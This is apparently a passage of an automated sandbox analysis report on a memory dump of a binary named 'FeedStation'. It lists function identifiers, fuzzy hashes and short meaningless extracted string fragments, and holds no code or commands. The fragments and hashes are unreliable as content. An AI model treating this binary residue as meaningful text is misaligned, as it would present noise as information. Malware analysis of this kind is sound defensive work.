                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2412B07160D7908BD765DF38C4803AFBBE2ABC5320F194A6ED9EA873D1D6748845CB42
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: %\8^$%]^_$'U"W$7Y([$@A$DWW$dWW$wh
                                                                                                                                                                                                                            • API String ID: 0-3129458299
                                                                                                                                                                                                                            • Opcode ID: 2135eb0e4b37efe33b7fdbc5a9b07736d8034935d068c60e40b09773910363d5
                                                                                                                                                                                                                            • Instruction ID: 9775f7052c220c8d589803cfffaa87c9890bd851af590a57157830666b821477
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2135eb0e4b37efe33b7fdbc5a9b07736d8034935d068c60e40b09773910363d5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89913372A1C3048BC708CF66C8811AFBBE2EBD0310F598A2DE5D99B351D635C619CB86
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: "&\($-Q)$3O52$5$EG7J$W$nnhl
                                                                                                                                                                                                                            • API String ID: 0-531127086
                                                                                                                                                                                                                            • Opcode ID: 75f133f1c62d021afef939ff7a285d2e08852c6d229f2afdf9374fcf5f20e104
                                                                                                                                                                                                                            • Instruction ID: 72e0e59e42cf22eec5f49c5808bded28043822a48c43b3f62f3bb0a07306f175
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75f133f1c62d021afef939ff7a285d2e08852c6d229f2afdf9374fcf5f20e104
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FB106B150C3908BD716CF2984A076BBFE1AFD7206F48896DE4D64F342D3398909CB56
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ()$:$A%T'$M!@#$XYZ[$vw
                                                                                                                                                                                                                            • API String ID: 0-4198765693
                                                                                                                                                                                                                            • Opcode ID: 6a8b1f7c741e56b62f4497c83b1da4a9edabe85e9e038eec9cedee57fcb23da6
                                                                                                                                                                                                                            • Instruction ID: 96e2f98cacc3242dd7d54b2a6ad6dd3b5f4419c8091146cecb6ed522feb804b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a8b1f7c741e56b62f4497c83b1da4a9edabe85e9e038eec9cedee57fcb23da6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE42E072A083418BE724CF28C88576BBBE1FFC9314F148A2DE9959B390D774D905CB96
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: !DEF$'^_P$Z$A&$cv$cv$jXZ
                                                                                                                                                                                                                            • API String ID: 0-3433727921
                                                                                                                                                                                                                            • Opcode ID: 44ec7e99e171cd3c56f0e9820b4923fd075e44292e432034400d61a1313e7d18
                                                                                                                                                                                                                            • Instruction ID: 063232e5128c0751eae0dc01ad51981e43ddf060e3fdef24d8a3f5373fda782d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44ec7e99e171cd3c56f0e9820b4923fd075e44292e432034400d61a1313e7d18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BB1EFB05187508BC724DF24C8917ABBBF1FF82714F188A5CE9DA4B3A0E3799841CB56
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: /^ $3^ $:\9^$CD$I,~M
                                                                                                                                                                                                                            • API String ID: 0-2906852946
                                                                                                                                                                                                                            • Opcode ID: 38da18ba0b9e5e909de58192f22536077d5a2d933b5bb99657bbc4f598f7cf89
                                                                                                                                                                                                                            • Instruction ID: 2f22f484510d2e64259f53b3f261f5cc1d54b5f19b27dd64686b3f78f1410d65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38da18ba0b9e5e909de58192f22536077d5a2d933b5bb99657bbc4f598f7cf89
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A8200756483809BE764CF25CD81B2BBBE2EBCA718F18C92EE6C547351D735D8028B42
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ;'#5$;'#5$bc$s${1-N
                                                                                                                                                                                                                            • API String ID: 0-3514434411
                                                                                                                                                                                                                            • Opcode ID: d20de5c0905d2079f3c68b2f41b171f524789e489d8d70a3f3f5b86ecfdd41a7
                                                                                                                                                                                                                            • Instruction ID: 2b6a06a9b4f811d5a95d6a3f14b9695b6314b3becd0bf9ab0d39d4cfa773da8b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d20de5c0905d2079f3c68b2f41b171f524789e489d8d70a3f3f5b86ecfdd41a7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77B1F2B150C3808BE718DF65C890A6FBBE6FF92304F18486DE5D28B251D778C60ACB56
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $:F@$E$MppK$oA/-
                                                                                                                                                                                                                            • API String ID: 0-362282541
                                                                                                                                                                                                                            • Opcode ID: ee279678633620b833d1a636f38f3a00abc2d448d510a6684df181e9c1ea7536
                                                                                                                                                                                                                            • Instruction ID: 956e87e6d498a6984d480bbf71a1a3a83497434775b0c8fd0a3aad6319715056
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee279678633620b833d1a636f38f3a00abc2d448d510a6684df181e9c1ea7536
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4D1E33161C7C18ED7258B2888907BBBFD2BFA3215F188A6EC0D98B2C2D7758506C757
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: 'Z\$QR$Y$BD
                                                                                                                                                                                                                            • API String ID: 0-1450262077
                                                                                                                                                                                                                            • Opcode ID: df0e679de3656e3ae7bd0b83e6567443406a372a2dbbd4126f89919701580893
                                                                                                                                                                                                                            • Instruction ID: 489e13939464550107ef816e795b5e10602747e4e0e5f4b23161177a1edf43a5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df0e679de3656e3ae7bd0b83e6567443406a372a2dbbd4126f89919701580893
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 609167715083608BD729CF24C4A2ABBB7E2FFD5304F08896ED5DA4B391E7748945CB92
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: S$T$U$Z
                                                                                                                                                                                                                            • API String ID: 0-3784216321
                                                                                                                                                                                                                            • Opcode ID: 584b030b7ed575e8b4aed262f7b4e7b4a56eb781e39c498705694f52f64c6f7c
                                                                                                                                                                                                                            • Instruction ID: 9385bc4f63fce8197b84d3474a98fb4d72915012a7fc2f5d9ad02d93ecb664d5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 584b030b7ed575e8b4aed262f7b4e7b4a56eb781e39c498705694f52f64c6f7c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8091813550C7809EE3148B3C849466BFFD2ABCA328F184E6DE4E6972D2C775C945CB4A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: K%H'$T!K#$t)*+
                                                                                                                                                                                                                            • API String ID: 0-1460954988
                                                                                                                                                                                                                            • Opcode ID: 32a693592f53446fd75c7522a6d2e013373b566441ba205e90359a66585307c6
                                                                                                                                                                                                                            • Instruction ID: 41dd806f21a6260b9a1252c027e5b1a7887ba8d9b1e96e6f977b24222ec276af
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32a693592f53446fd75c7522a6d2e013373b566441ba205e90359a66585307c6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54911972A183228BC718CF28C89176BB7F1EFD5750F19895EE8D58B354E7348945C782
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: 0^ $4^ $JL
                                                                                                                                                                                                                            • API String ID: 0-702367050
                                                                                                                                                                                                                            • Opcode ID: 2ff0124fff0e072c742c4c6f89a0b6b4a236fa3534c1a8160da1a9a8dd888269
                                                                                                                                                                                                                            • Instruction ID: 8a87f2bb2739d01d216d91cb89ed36a76726a97d9235dcf3d14d6cd7cf1f61d6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ff0124fff0e072c742c4c6f89a0b6b4a236fa3534c1a8160da1a9a8dd888269
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17610775901716CBCB208FA8C8917ABF7F1FF46720F14894CD8A66B795E378A801CB58
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: 0$8
                                                                                                                                                                                                                            • API String ID: 0-46163386
                                                                                                                                                                                                                            • Opcode ID: d3cda387a9768c09ff015c7b8e5be94765b17e9e7b1ff2866a36fc537d35600e
                                                                                                                                                                                                                            • Instruction ID: eb32cd1c4ff21b200171c91ec6a9756e4cff04f7c8f5aae766c5dcff20d4a482
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3cda387a9768c09ff015c7b8e5be94765b17e9e7b1ff2866a36fc537d35600e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 387247715083409FEB10CF18C884BABBBE5BF94319F05891EF99A8B391D375D958CB92
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: P[\]$}{ea
                                                                                                                                                                                                                            • API String ID: 0-536713914
                                                                                                                                                                                                                            • Opcode ID: 1c9a27527cc6aa779c535ed5315f78d5fc5a75d95774ea3ec5b651192e6f405a
                                                                                                                                                                                                                            • Instruction ID: d675b7f10bb19105fa9967daa39666af48140edfae51ca5f285abc49c7b35bbe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c9a27527cc6aa779c535ed5315f78d5fc5a75d95774ea3ec5b651192e6f405a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9C1267164C3818FEB14CF64D49036FBBE2BBD2615F18492EE5E25B381D775890ACB82
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: :$w}pz
                                                                                                                                                                                                                            • API String ID: 0-357338718
                                                                                                                                                                                                                            • Opcode ID: 502d28e896749126c3dc81b252d31bd84f74c9be5e06fdb93bc2265eac005fce
                                                                                                                                                                                                                            • Instruction ID: eaf9a31a8c9685af275fbdcae9b77ae73b223153ae2111a106c6cf374fe96859
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 502d28e896749126c3dc81b252d31bd84f74c9be5e06fdb93bc2265eac005fce
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7B1CE7060C3D18FD725CB2984A03ABFFE1AFD3205F188A6ED4D98B292D7354506CB56
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: :$w}pz
                                                                                                                                                                                                                            • API String ID: 0-357338718
                                                                                                                                                                                                                            • Opcode ID: 2c7a3e65267fc7651f826d9507dbc1255ceb4392cef76421a8d043ab557b0e85
                                                                                                                                                                                                                            • Instruction ID: 5c55998eff52615fad692927c882e9f1b1b30183ae1fa371451bae9385122d78
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c7a3e65267fc7651f826d9507dbc1255ceb4392cef76421a8d043ab557b0e85
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11919F7060C3D18ED725CF2984A07ABBFE1AFD3305F148A6ED4D98B292D7354506CB5A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: )$IEND
                                                                                                                                                                                                                            • API String ID: 0-707183367
                                                                                                                                                                                                                            • Opcode ID: c5432a4be49f480337042330377794e788b86fd00b88b59dceeb0432e15f1d79
                                                                                                                                                                                                                            • Instruction ID: cb0ad5cfff9f0bca8c28e289632c1b6cbc08a4a3ff5173d54654bccb920ad77e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5432a4be49f480337042330377794e788b86fd00b88b59dceeb0432e15f1d79
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D1CFB19083449FEB20DF15C881B5BBBE5EFA4305F04492EF99A9B381D375D948CB92
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ?012$eXYZ
                                                                                                                                                                                                                            • API String ID: 0-1866198938
                                                                                                                                                                                                                            • Opcode ID: cd78b8422fff4847232869b50a5c97ea50024fbc6a7fd06a63fa881e0e4d64d9
                                                                                                                                                                                                                            • Instruction ID: 10b06435081143ea35df508fc718e921015b2ee5efbf69b4e39b6b9b0afd1454
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd78b8422fff4847232869b50a5c97ea50024fbc6a7fd06a63fa881e0e4d64d9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54914532A083118FE718DF24C890A6FBBE2FFD1314F19893CE98597695D7349806C796
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: :$w}pz
                                                                                                                                                                                                                            • API String ID: 0-357338718
                                                                                                                                                                                                                            • Opcode ID: c438aa69e793ceb5d55b81b05b67c3c3850b469bd1be8d186d98635ec791d0b3
                                                                                                                                                                                                                            • Instruction ID: c1c35a9ca2af07b7fa61dc6031dc5a6942a9b49318efb6d56206b33864de15ec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c438aa69e793ceb5d55b81b05b67c3c3850b469bd1be8d186d98635ec791d0b3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED91907060C3D18ED725CF2984A07ABBFE1AFD3305F148A6ED4D98B292D735450ACB5A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ^$c
                                                                                                                                                                                                                            • API String ID: 0-3157265388
                                                                                                                                                                                                                            • Opcode ID: 9f2452c7b5d4c8234c69c43701c390fb07610106870851b940829162914dd0a3
                                                                                                                                                                                                                            • Instruction ID: af6ad4126ddf82667616aae089b13417c7e11b1b6a7f2bc3b891f549c65a4012
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f2452c7b5d4c8234c69c43701c390fb07610106870851b940829162914dd0a3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53910571A0D3918FE3258B6988903ABBBE2FFD7304F18896DD4C59B281D7798405875B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ^$c
                                                                                                                                                                                                                            • API String ID: 0-3157265388
                                                                                                                                                                                                                            • Opcode ID: e8a66d6f9c5c389b688cf5b890d3f3e265dbf1ec328b69183881c517035d074e
                                                                                                                                                                                                                            • Instruction ID: 0732b0e45daa2ad9dc76a5838d3bec8aebe4e2b0c55dd60ca5c1f48f88f9de41
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8a66d6f9c5c389b688cf5b890d3f3e265dbf1ec328b69183881c517035d074e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4910671A0D3918FE3298F6588903ABBFE2EFD7304F18896DD8C59B281D77984058757
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ^$c
                                                                                                                                                                                                                            • API String ID: 0-3157265388
                                                                                                                                                                                                                            • Opcode ID: ca776ccc93e2656822896a253e94143c0800a57da73a12422b2c9541501c226a
                                                                                                                                                                                                                            • Instruction ID: 7395e74532257da204448bae1dd19ebf16e87f475aba22d377de403e38185186
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca776ccc93e2656822896a253e94143c0800a57da73a12422b2c9541501c226a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2281F371A0D3D18FE3258F6588903ABBFE2AFD7304F18496CD8D59B285D7B884058B5B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: 7$gfff
                                                                                                                                                                                                                            • API String ID: 0-3777064726
                                                                                                                                                                                                                            • Opcode ID: c3a8d7a2b9d457f5b8ee049d84d09c97a270d80b90b08991c7317a00f9877cb3
                                                                                                                                                                                                                            • Instruction ID: 3ba985586991942661743f4a2b8d245f56dc2451b446e1d8e34ea95da948cf49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3a8d7a2b9d457f5b8ee049d84d09c97a270d80b90b08991c7317a00f9877cb3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 916146726042524BD768CF28CC517ABB7D2EBD2314F09863EE596DB391DB38D806CB81
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: @sD$@sD
                                                                                                                                                                                                                            • API String ID: 0-3553309172
                                                                                                                                                                                                                            • Opcode ID: cd43af48d1ef90a89c8ccf7ce68c4b47c10bf07b4cc9c40b5f5d9d8e4d6f92d1
                                                                                                                                                                                                                            • Instruction ID: 8ebe4ffec4dedf11ee2a5b0b3a8ed5f9611ffa03e504af2f99db339e3e00b718
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd43af48d1ef90a89c8ccf7ce68c4b47c10bf07b4cc9c40b5f5d9d8e4d6f92d1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88513573F652254BEF288E64CC916EE7A62BB81314F1E85EDC846F7384CA309D018B94
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: W<r>$p0]2
                                                                                                                                                                                                                            • API String ID: 0-3674761133
                                                                                                                                                                                                                            • Opcode ID: 03ecfdc9028c9cd2c7e853332f9080befe6be4266fde18c9d8ad53d9c4817c36
                                                                                                                                                                                                                            • Instruction ID: 9c522b001bcefffbf795f54d567813687f7c4a1044297563c0648ef2dbae353e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03ecfdc9028c9cd2c7e853332f9080befe6be4266fde18c9d8ad53d9c4817c36
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F51F372A483918BD334CB28C88079FBAD2AFD5314F19CE7DD4CEA7352EA3149458782
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: XvD$XvD
                                                                                                                                                                                                                            • API String ID: 0-3094705251
                                                                                                                                                                                                                            • Opcode ID: d7e10327db2936e4e37899c333ae45471752f1be14eb0eccfc33a5b0c1a7bce0
                                                                                                                                                                                                                            • Instruction ID: cac3dba2ca49ca95afca4d424b09b9203cc65c5227cac68b12d6f247e34aeace
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e10327db2936e4e37899c333ae45471752f1be14eb0eccfc33a5b0c1a7bce0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 982128767082524BEB08CF38C8947AE77D3ABD6314F09892E809F97291DB34954ACB49
                                                                                                                                                                                                                            Strings
